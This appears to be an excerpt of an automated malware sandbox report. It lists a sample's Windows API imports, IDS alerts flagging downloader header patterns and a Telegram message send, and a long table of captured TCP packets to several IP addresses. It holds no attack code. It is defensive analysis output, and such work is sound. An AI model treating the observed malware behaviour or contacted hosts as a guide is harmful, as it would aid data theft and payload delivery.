USER32.dll	GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T23:11:20.954898+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	50002	142.250.185.206	443	TCP
2025-01-10T23:11:26.480660+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	50004	132.226.247.73	80	TCP
2025-01-10T23:11:27.668006+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	50004	132.226.247.73	80	TCP
2025-01-10T23:11:28.215808+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	50006	104.21.112.1	443	TCP
2025-01-10T23:11:28.949280+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	50007	132.226.247.73	80	TCP
2025-01-10T23:11:36.178494+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	50018	104.21.112.1	443	TCP
2025-01-10T23:11:38.423143+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.4	50021	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 23:11:19.607497931 CET	50002	443	192.168.2.4	142.250.185.206
Jan 10, 2025 23:11:19.607534885 CET	443	50002	142.250.185.206	192.168.2.4
Jan 10, 2025 23:11:19.607659101 CET	50002	443	192.168.2.4	142.250.185.206
Jan 10, 2025 23:11:19.623104095 CET	50002	443	192.168.2.4	142.250.185.206
Jan 10, 2025 23:11:19.623166084 CET	443	50002	142.250.185.206	192.168.2.4
Jan 10, 2025 23:11:20.355488062 CET	443	50002	142.250.185.206	192.168.2.4
Jan 10, 2025 23:11:20.355637074 CET	50002	443	192.168.2.4	142.250.185.206
Jan 10, 2025 23:11:20.356265068 CET	443	50002	142.250.185.206	192.168.2.4
Jan 10, 2025 23:11:20.356317997 CET	50002	443	192.168.2.4	142.250.185.206
Jan 10, 2025 23:11:20.588933945 CET	50002	443	192.168.2.4	142.250.185.206
Jan 10, 2025 23:11:20.588954926 CET	443	50002	142.250.185.206	192.168.2.4
Jan 10, 2025 23:11:20.589327097 CET	443	50002	142.250.185.206	192.168.2.4
Jan 10, 2025 23:11:20.589375019 CET	50002	443	192.168.2.4	142.250.185.206
Jan 10, 2025 23:11:20.653240919 CET	50002	443	192.168.2.4	142.250.185.206
Jan 10, 2025 23:11:20.695334911 CET	443	50002	142.250.185.206	192.168.2.4
Jan 10, 2025 23:11:20.954855919 CET	443	50002	142.250.185.206	192.168.2.4
Jan 10, 2025 23:11:20.954917908 CET	50002	443	192.168.2.4	142.250.185.206
Jan 10, 2025 23:11:20.954950094 CET	443	50002	142.250.185.206	192.168.2.4
Jan 10, 2025 23:11:20.955002069 CET	50002	443	192.168.2.4	142.250.185.206
Jan 10, 2025 23:11:20.955014944 CET	443	50002	142.250.185.206	192.168.2.4
Jan 10, 2025 23:11:20.955034971 CET	443	50002	142.250.185.206	192.168.2.4
Jan 10, 2025 23:11:20.955065966 CET	50002	443	192.168.2.4	142.250.185.206
Jan 10, 2025 23:11:20.955094099 CET	50002	443	192.168.2.4	142.250.185.206
Jan 10, 2025 23:11:20.957222939 CET	50002	443	192.168.2.4	142.250.185.206
Jan 10, 2025 23:11:20.957253933 CET	443	50002	142.250.185.206	192.168.2.4
Jan 10, 2025 23:11:20.994693041 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:20.994751930 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:20.994842052 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:20.995177031 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:20.995197058 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:21.656517029 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:21.656621933 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:21.660800934 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:21.660815001 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:21.661118984 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:21.662372112 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:21.662803888 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:21.707334995 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.487521887 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.487603903 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.493083954 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.493172884 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.505686998 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.505757093 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.505779982 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.505825043 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.511965036 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.512332916 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.581481934 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.581577063 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.581613064 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.581648111 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.581664085 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.581687927 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.581711054 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.581873894 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.582890034 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.582948923 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.582962036 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.583005905 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.589272976 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.589937925 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.589943886 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.590001106 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.595391035 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.595593929 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.595614910 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.595655918 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.601643085 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.601711035 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.601730108 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.601767063 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.607753038 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.607935905 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.607953072 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.607995033 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.614068985 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.617980003 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.618006945 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.618077993 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.620574951 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.620631933 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.620671988 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.620723963 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.625860929 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.631339073 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.631346941 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.631552935 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.631616116 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.631678104 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.631709099 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.631768942 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.637386084 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.641349077 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.648096085 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.649645090 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.649661064 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.649710894 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.671432972 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.671570063 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.671591997 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.671622038 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.671641111 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.671653032 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.672173977 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.672204018 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.672219038 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.672228098 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.672336102 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.672343016 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.672398090 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.672780037 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.672831059 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.672842026 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.672887087 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.673780918 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.677932978 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.677938938 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.677983046 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.679058075 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.679105997 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.679125071 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.679168940 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.684111118 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.684171915 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.684194088 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.684245110 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.689148903 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.689572096 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.689578056 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.689630032 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.693837881 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.698117971 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.698124886 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.698169947 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.698376894 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.698429108 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.698473930 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.698523045 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.703170061 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.705612898 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.705619097 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.705665112 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.707673073 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.707726002 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.707762957 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.707811117 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.712369919 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.713713884 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.713721037 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.713771105 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.716954947 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.717014074 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.717114925 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.717164993 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.722122908 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.725440025 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.725446939 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.725492001 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.725497007 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.725541115 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.725550890 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.725596905 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.725637913 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.725692034 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.725728989 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.725780010 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.729715109 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.733355045 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.733361959 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.733407974 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.733597040 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.733649015 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.733680010 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.733728886 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.737437010 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.741101027 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.741162062 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.741173029 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.741214991 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.741220951 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.741261005 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.744743109 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.745424986 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.745433092 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.745479107 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.749598980 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.751722097 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.751730919 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.752182961 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.763741016 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.763900042 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.763942003 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.763972998 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.763982058 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.763994932 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.764007092 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.764030933 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.764056921 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.764635086 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.764683962 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.764734983 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.764741898 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.764791012 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.764796019 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.764847040 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.765535116 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.765572071 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.765620947 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.765629053 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.765674114 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.766280890 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.766329050 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.766333103 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.766376972 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.768371105 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.768574953 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.768580914 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.768625021 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.772836924 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.772973061 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.773022890 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.773030996 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.773072004 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.773148060 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.773188114 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.776757002 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.777192116 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.777247906 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.777255058 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.777322054 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.777326107 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.777371883 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.781547070 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.781729937 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.781795979 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.781804085 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.781850100 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.781855106 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.781914949 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.786179066 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.786361933 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.786431074 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.786441088 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.786484957 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.786490917 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.786535978 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.790751934 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.790910959 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.790967941 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.790977001 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.791019917 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.791026115 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.791071892 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.795964003 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.796154976 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.796216011 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.796225071 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.796267033 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.796272039 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.796319008 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.800071955 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.800261021 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.800318003 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.800326109 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.800369024 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.800374031 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.800419092 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.804723024 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.804903030 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.804970026 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.804976940 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.805030107 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.805038929 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.805080891 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.806340933 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.809461117 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.809465885 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.809511900 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.809520006 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.809565067 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.809581995 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.809633017 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.809653997 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.809704065 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.814544916 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.814645052 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.814712048 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.814718008 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.814759970 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.816128969 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.816183090 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.817847967 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.817903996 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.817972898 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.818380117 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.818430901 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.818437099 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.818475962 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.821953058 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.822137117 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.822196007 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.822206020 CET	443	50003	142.250.184.193	192.168.2.4
Jan 10, 2025 23:11:24.822244883 CET	50003	443	192.168.2.4	142.250.184.193
Jan 10, 2025 23:11:24.823688030 CET	443	50003	142.250.184.193	192.168.2.4
